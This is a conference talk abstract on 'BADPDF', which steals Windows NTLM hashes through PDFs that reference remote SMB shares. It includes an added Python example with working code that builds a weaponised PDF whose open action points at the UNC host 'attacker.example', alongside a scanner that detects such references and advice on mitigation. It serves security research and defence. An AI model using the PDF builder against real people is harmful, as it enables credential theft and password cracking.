BADPDF – Stealing Windows Credentials via PDF Files

Ido Solomon

Playlists: 'gpn19'

Microsoft NTLM is an authentication protocol used on networks that include systems running the Windows operating system, and on stand-alone systems. Despite Microsoft's implementation of Kerberos, NTLM is still in use in order to support older systems. Many exploits in the past targeted Microsoft Office and Windows OS internal functions in order to leak a Windows user's NTLM hashes (more precisely, the NTLM challenge-response values the client sends during authentication), which can then be cracked offline to disclose the original passwords. Are those the only products vulnerable to NTLM credential theft? Find out how PDF files can be weaponized to automatically achieve NTLM hash leaks with no user interaction.

Shortly after it was reported that malicious actors can exploit a vulnerability in Microsoft Outlook to leak a Windows user's NTLM hashes, our research team revealed that an NTLM hash leak can be achieved via PDF files with no user interaction or exploitation. Rather than exploiting a vulnerability in Microsoft Office files or Outlook, attackers can weaponize a PDF file by abusing a legitimate feature that allows remote documents and files to be referenced and embedded within it. By pointing the embedded object at a remote SMB server under the attacker's control, the target automatically leaks credentials in the form of NTLM hashes when the PDF is opened: the viewer asks Windows to open the remote path, and the Windows SMB client authenticates to the attacker's server on the user's behalf.
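The following is an added example, not code from the talk or from the original research: it builds a minimal PDF whose document-level /OpenAction is a /GoToR (go to remote document) action whose /F file specification names a UNC path, which is the kind of remote-file reference the abstract describes, and then shows the check a defender would run over a PDF to find such references. The host name, the object layout and the scanner are this example's own assumptions; the original proof of concept is not reproduced here.

```python
import re

# Constructed sample target for the example; not a real host.
UNC_TARGET = r"\\attacker.example\share\doc.pdf"


def pdf_string(s: str) -> bytes:
    """Encode text as a PDF literal string, escaping the characters that are
    special inside ( ... ); every backslash in a UNC path is therefore doubled."""
    out = s.replace("\\", "\\\\").replace("(", "\\(").replace(")", "\\)")
    return b"(" + out.encode("latin-1") + b")"


def build_poc_pdf(file_spec: str) -> bytes:
    """Build a one-page PDF whose /OpenAction is a /GoToR action. The viewer
    resolves the /F file specification as soon as the document opens; when it
    is a UNC path, that resolution is what triggers the SMB authentication.
    Minimal construction for this example, not the original research PoC."""
    objs = [
        b"<< /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >>",
        b"<< /Type /Pages /Kids [3 0 R] /Count 1 >>",
        b"<< /Type /Page /Parent 2 0 R /MediaBox [0 0 200 200] >>",
        b"<< /Type /Action /S /GoToR /F " + pdf_string(file_spec) + b" /D [0 /Fit] >>",
    ]
    out = bytearray(b"%PDF-1.7\n")
    offsets = []
    for num, body in enumerate(objs, start=1):
        offsets.append(len(out))
        out += b"%d 0 obj\n%s\nendobj\n" % (num, body)
    xref_pos = len(out)
    out += b"xref\n0 %d\n0000000000 65535 f \n" % (len(objs) + 1)
    for off in offsets:
        out += b"%010d 00000 n \n" % off
    out += b"trailer\n<< /Size %d /Root 1 0 R >>\nstartxref\n%d\n%%%%EOF\n" % (len(objs) + 1, xref_pos)
    return bytes(out)


# Action subtypes that make a viewer resolve an external file specification.
ACTION_RE = re.compile(rb"/S\s*/(GoToR|GoToE|Launch|ImportData)\b")
# /F followed by a literal (...) string or a hex <...> string.
FILE_RE = re.compile(rb"/F\s*(\((?:\\.|[^\\)])*\)|<[0-9A-Fa-f\s]*>)", re.S)
ESCAPES = {b"n": b"\n", b"r": b"\r", b"t": b"\t", b"b": b"\b", b"f": b"\f"}


def decode_pdf_string(tok: bytes) -> str:
    """Decode a PDF literal or hex string token to text (Latin-1 is enough for
    UNC paths; octal escapes are not handled in this small example)."""
    if tok.startswith(b"<"):
        digits = re.sub(rb"\s", b"", tok[1:-1])
        if len(digits) % 2:            # PDF pads a trailing odd digit with 0
            digits += b"0"
        return bytes.fromhex(digits.decode()).decode("latin-1")
    body, out, i = tok[1:-1], bytearray(), 0
    while i < len(body):
        if body[i:i + 1] == b"\\" and i + 1 < len(body):
            i += 1
            out += ESCAPES.get(body[i:i + 1], body[i:i + 1])
        else:
            out += body[i:i + 1]
        i += 1
    return out.decode("latin-1")


def find_remote_file_actions(pdf: bytes):
    """Return (action subtype, path) for every action whose /F names a UNC path
    (two leading backslashes, or the PDF-portable //host/share form). Looks only
    at uncompressed object syntax; objects packed into compressed object streams
    must be inflated first or this scanner will miss them."""
    hits = []
    for obj in re.finditer(rb"\bobj\b(.*?)\bendobj\b", pdf, re.S):
        body = obj.group(1)
        act = ACTION_RE.search(body)
        if not act:
            continue
        for f in FILE_RE.finditer(body):
            path = decode_pdf_string(f.group(1))
            if path.startswith("\\\\") or path.startswith("//"):
                hits.append((act.group(1).decode(), path))
    return hits


if __name__ == "__main__":
    poc = build_poc_pdf(UNC_TARGET)
    print(find_remote_file_actions(poc))
```

The scanner is deliberately regex-based so it works on a raw file without a PDF library; a production check should walk the object graph with a real parser (including /AA additional-action dictionaries, annotations and object streams), and the same UNC test applies to any file specification, not only the four action subtypes listed. Even with no viewer bug involved, the network-level mitigation is the one for every NTLM leak: block outbound SMB (TCP 445) at the perimeter and restrict NTLM where Kerberos is available.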
In this presentation I will first cover the basic structure of a PDF file and its objects, in particular the Dictionary object where this vulnerability lies.
Next I will present our team’s Proof of Concept, injecting malicious code into a benign PDF file, weaponizing it, and causing an NTLM hash leak upon opening the file.
I will then discuss the impact of this attack, by showing the leaked NTLM hash captured on the remote SMB server and how it can be cracked to retrieve the victim’s original password.